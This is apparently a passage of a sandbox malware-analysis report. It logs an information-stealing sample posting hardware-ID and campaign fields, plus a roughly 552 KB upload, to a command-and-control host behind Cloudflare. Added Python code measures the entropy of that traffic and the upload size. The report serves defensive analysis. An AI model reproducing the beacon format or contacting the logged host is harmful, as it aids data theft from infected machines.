2024-12-23 07:39:02 UTC | 1200 | OUT | Data Ascii: --B15U8NRI2RHKContent-Disposition: form-data; name="hwid"C5A1D9626329DF2DAC8923850305D13E--B15U8NRI2RHKContent-Disposition: form-data; name="pid"1--B15U8NRI2RHKContent-Disposition: form-data; name="lid"PsFKDg--pablo--B15U8NRI2RHK
2024-12-23 07:39:03 UTC | 1130 | IN | HTTP/1.1 200 OK
                                                                                                            Date: Mon, 23 Dec 2024 07:39:03 GMT
                                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                                            Transfer-Encoding: chunked
                                                                                                            Connection: close
                                                                                                            Set-Cookie: PHPSESSID=o1igen25re4e2mvmfdu293f8au; expires=Fri, 18 Apr 2025 01:25:42 GMT; Max-Age=9999999; path=/
                                                                                                            Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                            Cache-Control: no-store, no-cache, must-revalidate
                                                                                                            Pragma: no-cache
                                                                                                            X-Frame-Options: DENY
                                                                                                            X-Content-Type-Options: nosniff
                                                                                                            X-XSS-Protection: 1; mode=block
                                                                                                            cf-cache-status: DYNAMIC
                                                                                                            vary: accept-encoding
                                                                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=DmmMPLiIHKnsAe8qyfya2WFnceVeYoa%2FhfIc%2FP%2Fw3lyuUXowpeqdLkyRy12f5aRdYmcRCTz%2B4OGldE9fwSxO7mOyCFpaYH4hwhmvaDCPp%2BRRctuvfgU8tVhEDT9TL%2FIlepQ%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                            Server: cloudflare
                                                                                                            CF-RAY: 8f66b20dd96342f2-EWR
                                                                                                            alt-svc: h3=":443"; ma=86400
                                                                                                            server-timing: cfL4;desc="?proto=TCP&rtt=2089&min_rtt=2082&rtt_var=795&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2837&recv_bytes=2110&delivery_rate=1363848&cwnd=222&unsent_bytes=0&cid=1880d7562e39e063&ts=826&x=0"
2024-12-23 07:39:03 UTC | 20 | IN | Data Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a
Data Ascii: fok 8.46.123.189
2024-12-23 07:39:03 UTC | 5 | IN | Data Raw: 30 0d 0a 0d 0a
Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
6 | 192.168.2.8 | 49712 | 104.21.32.96 | 443 | 7792 | C:\Users\user\Desktop\QQ5BxgG5G6.exe
Timestamp | Bytes transferred | Direction | Data
2024-12-23 07:39:05 UTC | 279 | OUT | POST /api HTTP/1.1
                                                                                                            Connection: Keep-Alive
                                                                                                            Content-Type: multipart/form-data; boundary=TLUL9N00R954C6U
                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                            Content-Length: 552337
                                                                                                            Host: cuddlyready.xyz
2024-12-23 07:39:05 UTC | 15331 | OUT | Data Ascii: --TLUL9N00R954C6UContent-Disposition: form-data; name="hwid"C5A1D9626329DF2DAC8923850305D13E--TLUL9N00R954C6UContent-Disposition: form-data; name="pid"1--TLUL9N00R954C6UContent-Disposition: form-data; name="lid"PsFKDg--pablo--TLUL9
2024-12-23 07:39:07 UTC | 1129 | IN | HTTP/1.1 200 OK
                                                                                                            Date: Mon, 23 Dec 2024 07:39:07 GMT
                                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                                            Transfer-Encoding: chunked
                                                                                                            Connection: close
                                                                                                            Set-Cookie: PHPSESSID=iakqomqleghh9p3n05e0b1hml6; expires=Fri, 18 Apr 2025 01:25:46 GMT; Max-Age=9999999; path=/
                                                                                                            Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                            Cache-Control: no-store, no-cache, must-revalidate
                                                                                                            Pragma: no-cache
                                                                                                            X-Frame-Options: DENY
                                                                                                            X-Content-Type-Options: nosniff
                                                                                                            X-XSS-Protection: 1; mode=block
                                                                                                            cf-cache-status: DYNAMIC
                                                                                                            vary: accept-encoding
                                                                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=iY3I4820ALMDSgycMdcP4mEFX5AvmMrqzyGs6e7VMhS0ZjWKjSBDsomKZdjzPm3yf9gUlOPsEzYWLPQQx1adKco8g31kB3YzJPBC7WtxiRwCasN4%2FGTHV%2BLTONTAHrMDLOI%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                            Server: cloudflare
                                                                                                            CF-RAY: 8f66b21e28087c7e-EWR
                                                                                                            alt-svc: h3=":443"; ma=86400
                                                                                                            server-timing: cfL4;desc="?proto=TCP&rtt=1805&min_rtt=1796&rtt_var=693&sent=198&recv=576&lost=0&retrans=0&sent_bytes=2835&recv_bytes=554836&delivery_rate=1557333&cwnd=228&unsent_bytes=0&cid=f3db075809ddd0aa&ts=2432&x=0"
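Two checks an analyst would run over the session above, written here as an added example (this is not code from the Joe Sandbox report or from the sample): the outbound "Data Raw" POST bodies are measured for Shannon entropy to confirm they are encrypted rather than plaintext stealer output, and the C2's Cloudflare `server-timing: cfL4` header is parsed, since its `recv_bytes` field (554836 on this connection) is assumed here to count bytes the edge received from the client, i.e. what the sample uploaded. The 64-byte excerpt is copied from the first OUT line of the report; the plaintext comparison string and the 0.9 entropy-ratio threshold are constructed for the example.

```python
"""Added example, not part of the Joe Sandbox report: entropy check on the
sample's outbound POST bodies and a parser for the C2's Cloudflare
server-timing header, to quantify what was uploaded on this connection."""
import math
import re
from collections import Counter
from urllib.parse import parse_qs

# First 64 bytes of the first outbound "Data Raw" line in the report (excerpt).
DATA_RAW_EXCERPT = (
    "Data Raw: 64 e5 99 d3 54 a1 ff b8 c4 49 08 cd 97 91 b5 42 "
    "d1 cb 63 03 4a 63 fd 0f 4e 3a ba c0 8b ce 2a 91 "
    "53 8d 14 73 97 62 75 d7 68 f5 e1 d6 ad 17 bc a0 "
    "71 55 cb de ed 72 91 7b df 13 19 e9 56 16 0f 22"
)

# Constructed plaintext of similar size: what an unencrypted stealer upload
# would look like, used only as the low-entropy comparison.
PLAINTEXT_SAMPLE = b"user=admin&host=DESKTOP-1&os=Windows 10 Pro&browser=chrome&wallets=none"

# The server-timing header exactly as the C2 returned it (from the report).
SERVER_TIMING = (
    'cfL4;desc="?proto=TCP&rtt=1805&min_rtt=1796&rtt_var=693&sent=198&recv=576'
    '&lost=0&retrans=0&sent_bytes=2835&recv_bytes=554836&delivery_rate=1557333'
    '&cwnd=228&unsent_bytes=0&cid=f3db075809ddd0aa&ts=2432&x=0"'
)


def parse_data_raw(line: str) -> bytes:
    """Turn a Joe Sandbox 'Data Raw: 64 e5 ...' line into bytes."""
    m = re.search(r"Data Raw:\s*((?:[0-9a-fA-F]{2}\s*)+)", line)
    if not m:
        raise ValueError("no Data Raw payload in line")
    return bytes.fromhex(m.group(1))


def shannon_entropy(data: bytes) -> float:
    """Bits per byte: 0.0 for a constant stream, 8.0 for uniform random bytes."""
    if not data:
        return 0.0
    n = len(data)
    return -sum(c / n * math.log2(c / n) for c in Counter(data).values())


def entropy_ratio(data: bytes) -> float:
    """Entropy relative to the maximum reachable at this length. A short
    buffer cannot reach 8 bits/byte, so normalise by log2(min(256, n))."""
    n = len(data)
    if n < 2:
        return 0.0
    return shannon_entropy(data) / math.log2(min(256, n))


def looks_encrypted(data: bytes, threshold: float = 0.9) -> bool:
    """Heuristic (assumed threshold): near-maximal entropy means the body is
    encrypted or compressed, not the key=value text a plaintext stealer sends."""
    return entropy_ratio(data) >= threshold


def parse_cf_server_timing(header: str) -> dict:
    """Extract the fields of Cloudflare's cfL4 server-timing header as a dict.
    Numeric fields become ints; recv_bytes is read as bytes the edge received
    from the client, i.e. the sample's upload volume on this connection."""
    m = re.search(r'desc="\?([^"]*)"', header)
    if not m:
        raise ValueError("no cfL4 desc field")
    fields = {}
    for key, values in parse_qs(m.group(1)).items():
        value = values[0]
        fields[key] = int(value) if value.lstrip("-").isdigit() else value
    return fields


if __name__ == "__main__":
    body = parse_data_raw(DATA_RAW_EXCERPT)
    print(f"excerpt: {len(body)} bytes, {shannon_entropy(body):.2f} bits/byte, "
          f"ratio {entropy_ratio(body):.2f}, encrypted={looks_encrypted(body)}")
    print(f"plaintext sample: ratio {entropy_ratio(PLAINTEXT_SAMPLE):.2f}, "
          f"encrypted={looks_encrypted(PLAINTEXT_SAMPLE)}")
    timing = parse_cf_server_timing(SERVER_TIMING)
    print(f"uploaded to C2 on this connection: {timing['recv_bytes']} bytes; "
          f"received from C2: {timing['sent_bytes']} bytes")
```

The entropy ratio rather than the raw bit count matters for these dumps: a 64-byte excerpt tops out at 6 bits/byte, so a fixed "above 7.0 means encrypted" rule would misclassify every short chunk. The `recv_bytes` figure is worth recording in the incident notes because it bounds the exfiltrated data size even when the body itself cannot be decrypted.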


                                                                                                            Target ID:0
                                                                                                            Start time:02:38:46
                                                                                                            Start date:23/12/2024
                                                                                                            Path:C:\Users\user\Desktop\QQ5BxgG5G6.exe
                                                                                                            Wow64 process (32bit):true
                                                                                                            Commandline:"C:\Users\user\Desktop\QQ5BxgG5G6.exe"
                                                                                                            Imagebase:0xd00000
                                                                                                            File size:1'866'752 bytes
                                                                                                            MD5 hash:4A7846259E3D582B57BD30C67322C357
                                                                                                            Has elevated privileges:true
                                                                                                            Has administrator privileges:true
                                                                                                            Programmed in:C, C++ or other language
                                                                                                            Reputation:low
                                                                                                            Has exited:true

                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000003.1580254004.00000000015CA000.00000004.00000020.00020000.00000000.sdmp, Offset: 015CA000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_3_15ca000_QQ5BxgG5G6.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID: a[QF
                                                                                                              • API String ID: 0-4264035995
                                                                                                              • Opcode ID: 1b239e40b685216ddc899326887945657f67497edc18e22bcfa8b60114c81a8d
                                                                                                              • Instruction ID: 2cfc87ad49745e51d7012349e4cd03f50f77e84ea13c4ac62db81aa965862382
                                                                                                              • Opcode Fuzzy Hash: 1b239e40b685216ddc899326887945657f67497edc18e22bcfa8b60114c81a8d
                                                                                                              • Instruction Fuzzy Hash: 6581813144E3D19FC703CB7599A6596BFB1BE4321071E45DBD4C08F463C228696ACBA7
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000003.1580254004.00000000015CA000.00000004.00000020.00020000.00000000.sdmp, Offset: 015CA000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_3_15ca000_QQ5BxgG5G6.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: bc6be63083a527b7d804b27b72482963c2660f6ef935f95d59b16a33d408c927
                                                                                                              • Instruction ID: 54422f29caa7bcbd5606f45c961c60bcd4f03438f87947ae5504fe12fe238966
                                                                                                              • Opcode Fuzzy Hash: bc6be63083a527b7d804b27b72482963c2660f6ef935f95d59b16a33d408c927
                                                                                                              • Instruction Fuzzy Hash: 372103611092D18FD316CF38D4946817FA2FF8B31639E40DCC9C18F527C2B56542C742